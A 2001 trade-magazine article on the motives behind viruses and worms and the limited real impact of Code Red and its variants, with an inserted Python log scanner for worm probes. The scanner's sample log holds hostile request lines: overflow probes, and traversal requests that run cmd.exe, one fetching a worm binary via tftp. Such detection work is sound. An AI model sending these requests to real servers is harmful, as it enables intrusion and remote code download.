What We Can Learn About Malicious Mobile Code
J.J. Gray, @stake

Nese October.qxd 10/25/01 9:33 AM Page 9

Just as graffiti has been around for as long as humans have been capable of written communication, malicious mobile code has existed for as long as humans have mastered digital communication. It is only in the last few years that viruses and worms have become worthy of mainstream media attention. The first notable instance was the 'Apple Virus' that broke out in 1981. By 1986, one of the first PC-based viruses, 'The Brain', had been created.

Since 1981, technology has changed dramatically and so have the viruses that infect it. Like their biological counterparts, computer viruses also evolve, mutate and adapt to make more efficient use of their environment. Anti-virus systems, too, have had to evolve in response to the dynamic environment. This article will explore:

• Reasons why people create malicious mobile code.
• How the media responds.
• The high infection rates of malicious mobile code.

Why do it?

'Love Bug', 'Melissa' and 'Kournikova' have all worked their way into common parlance. So why does someone create them? What does the virus or worm writer hope to achieve?

There may be a number of different reasons behind this phenomenon:

Revenge

Revenge is a common motive, and perhaps the oldest: an unhappy ex-employee, former supplier or business partner, or a failed job candidate who feels their skill was not understood or appreciated.

Kudos

In certain circles, hacking is considered an art, and getting your creation on the front page of almost every online news website will raise you to the level of deity.

Within the virus-writing, hacking, anti-virus and security communities, certain names have become as famous (or infamous) as a pop star.

Names such as Robert T. Morris Jr. (author of the 'Morris Worm') and, more recently, people like David L. Smith and Jan de Wit (authors of the 'Melissa' and 'Kournikova' viruses respectively).

Because I Can

Motivation for writing malicious code can be the same as for the person who smashes up cars or loots shops in the middle of a riot, or who throws bricks through windows or slashes bus seats. They do it for the thrill, demonstrating their power over the law and their ability to get away with it. This digital vandal doesn't care what the results will be, as long as they are widespread and destructive. If it gets media attention they will have had their '15 minutes of fame'.

Accident

Some viruses are created as 'Proof of Concept' code, a demonstration prototype, if you will, to test either a theory or some software. They are created in a laboratory in much the same way as a virologist would create cultures of biological viruses and bacteria for testing and examination. The virus then accidentally breaks out of the laboratory and into the big wide world, spreading and infecting as it goes.

Other

Sometimes there is no single motivation. It can vary depending on the views of the community the program writer affects or the interests that they are serving. The one thing we can say with certainty is that technology is here to stay and so are the viruses and worms that infect it.

While we can continue to rail against those that create them, perhaps it is more productive to simply accept that they will always exist, evaluate the risks they pose and plan accordingly. Only then can we move on with life and with business, denying today's digital vandals the celebrity status that they seem to have acquired.

Colour coded malware

'Code Red' is the latest example of this phenomenon. 'Code Red' is a worm. Worms are different from many viruses in that they do not require direct human action to propagate.


Viruses, on the other hand, need human action to spread. This can be done by downloading an infected program from the Internet, or double-clicking that strange attachment in the email sent to you and fifty other people by someone you know, with the subject line of "Look at this!" or some other invitation.

The 'Code Red' worm may not be in the media spotlight anymore, but what most people may not realize is that it is still active on approximately 10% of the originally infected machines.

Code Red was modified several timesto create three or four variants.

The current attention is focused on Code Blue, or even Code Green. Code Blue is a similar creation, though it exploits a different vulnerability. It does not exploit anything new: it uses the Unicode directory traversal exploit that Microsoft supplied a patch for on 17 October 2000 (bulletin MS00-078). Its target is also different, as it attacks the site of a Chinese network security provider.

Code Green is another worm, created by a German known as 'Der HexXer', that scans the Internet looking for servers infected with Code Red Version II and then patches the server before continuing to scan from the new server. Regardless of intent, it is still self-propagating code that executes without the knowledge and permission of the web server owners.

'Code Red' itself uses the same technique as the 'Morris Worm' that attacked the fledgling Internet in 1988: exploit a known vulnerability in a particular piece of software (for Morris, chiefly Sendmail; for Code Red, a buffer overflow in the Indexing Service ISAPI extension of Microsoft's IIS web server, for which a patch had been available since June 2001) to install itself on the compromised host and then begin further replication.
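The probes these worms send are easy to recognise in a web server's own access log. The following Python script is an added example, not code from the article or from @stake: it runs a handful of signature checks over a constructed common-log-format sample (the addresses, timestamps and lines are made up; the request-line patterns follow the published descriptions of Code Red, Code Red II and the MS00-078 Unicode traversal). It goes slightly beyond the text in flagging any over-long UTF-8 sequence after `..` rather than one specific encoding, because lead bytes 0xC0 and 0xC1 never appear in valid UTF-8 and so can only mark a traversal attempt.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Request-line signatures of the worms discussed above. Written from the
# public descriptions of the worms; nothing here comes from the article.
SIGNATURES = [
    # Code Red sends one over-long GET to the Indexing Service ISAPI
    # extension (idq.dll). The padding that overflows the buffer is a run
    # of 'N' in the original worm and a run of 'X' in Code Red II.
    ("Code Red (variant I probe)", re.compile(r"/default\.ida\?N{20,}")),
    ("Code Red II probe", re.compile(r"/default\.ida\?X{20,}")),
    # Unicode directory traversal (MS00-078): '..' followed by an
    # over-long UTF-8 encoding of '/' or '\' (e.g. %c0%af, %c1%9c).
    # A lead byte of 0xC0 or 0xC1 can only start an over-long sequence,
    # which valid UTF-8 never contains, so any such byte after '..' is
    # hostile regardless of which continuation byte the attacker chose.
    ("Unicode directory traversal (MS00-078)",
     re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.IGNORECASE)),
]

# Common log format: client ident user [time] "method path proto" status
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)

# Constructed sample log: one normal request, a Code Red and a Code Red II
# probe, two traversal probes from one host, and a legitimate UTF-8 path
# (the euro sign) that a naive "%cX" check might wrongly flag.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Jul/2001:13:04:11 +0000] "GET /index.html HTTP/1.0" 200
192.0.2.44 - - [19/Jul/2001:13:04:12 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200
198.51.100.7 - - [05/Aug/2001:02:17:45 +0000] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200
203.0.113.3 - - [01/Sep/2001:09:40:02 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200
203.0.113.3 - - [01/Sep/2001:09:40:03 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+203.0.113.3+GET+worm.exe HTTP/1.0" 200
192.0.2.10 - - [01/Sep/2001:09:41:00 +0000] "GET /docs/%e2%82%ac-pricing.html HTTP/1.0" 200
"""


@dataclass
class Hit:
    src: str
    label: str
    path: str


def classify_request(path: str) -> Optional[str]:
    """Return the label of the first signature matching a request path, or None."""
    for label, pattern in SIGNATURES:
        if pattern.search(path):
            return label
    return None


def scan_log(text: str) -> List[Hit]:
    """Parse a common-log-format access log and return every worm probe found."""
    hits: List[Hit] = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip malformed or non-CLF lines rather than guessing
        label = classify_request(m.group("path"))
        if label is not None:
            hits.append(Hit(m.group("src"), label, m.group("path")))
    return hits


def probing_hosts(hits: List[Hit]) -> Dict[str, Set[str]]:
    """Map each source address to the set of probe types it sent.

    A probing address is itself an infected machine (these worms spread
    only from compromised hosts), so this is the list to hand to whoever
    owns those netblocks.
    """
    out: Dict[str, Set[str]] = {}
    for h in hits:
        out.setdefault(h.src, set()).add(h.label)
    return out


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h.src:15} {h.label:40} {h.path[:60]}")
```

Run against a real IIS log the same two regexes carry over unchanged; only `LOG_LINE` needs adjusting to the W3C extended format IIS writes by default.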

'Code Red' does not attack straight away. During the first part of each month an infected host does nothing but scan for and infect new hosts. Then, at a synchronised time (from the 20th of the month), all the worms send large amounts of traffic to the White House official website in an attempt to overwhelm it and prevent people viewing it: a distributed denial-of-service (DDoS) attack.

Despite the best efforts of Code Red/Green/Blue or any of the variants, the Internet has not ground to a halt. In fact, Code Blue has had little impact even though it is active in the wild.

In August 2001, Netcraft conducted one of its regular surveys of all the web servers it could identify on the Internet (www.netcraft.com/survey/). It found nearly 31 million websites, of which just over 8 million (26%) were running some form of Microsoft web server software and thus were potentially vulnerable to the 'Code Red' worm. That figure is an upper bound: only unpatched IIS installations with the Indexing Service ISAPI mapping still enabled were actually exploitable.

At the height of the first round of 'Code Red' activity, it was estimated that 250 000 to 300 000 hosts were infected. The second time around, it only appeared to be in the order of 100 000. Compared to a potential target population of 8 million servers, these are pretty small numbers.

As for the feared effect on the Internet, if your network happens to be near the worm's target of the US Presidential website, then you may have noticed some slowing of Internet traffic, in much the same way we have rush hour traffic at the same time each day. But, overall, there has been no major global impact.

Let's not forget that the Internet is a robust, global entity that does not recognize physical or international borders and is designed to find its way around 'local difficulties'.

But why all the recent press attention? Certainly, technology now touches almost all our lives, as it has done for some time now. Still, it is hard to imagine, even five years ago, that a mere computer virus would elicit the kind of press reaction that we have seen the 'Code Red' worm and its offspring receive.

Certain sections of the media would have us believe this has been a disaster of enormous proportions, whipping the public into a frenzy and issuing dire warnings of the collapse of the Internet. Software vendors have also fuelled the fire by spreading 'FUD' (Fear, Uncertainty and Doubt) to aggressively market their 'silver bullet' solutions.

While raising awareness is important, itneeds to be handled in a calm and profes-sional manner.

About the author

J.J. Gray is security architect at @stake, a digital security consultancy. Reach him by email on jj@atstake.com.


A worm of any other colour...

Red is still working on 10% of infected machines. It sometimes targets the White House with a denial-of-service. There are many versions doing the rounds.

Blue uses a known vulnerability. Sometimes it attacks a security site in China.

Green scans the Internet for servers infected with Code Red II. It patches the vulnerability that lets it in.

None of these has even come close to bringing down the Internet.
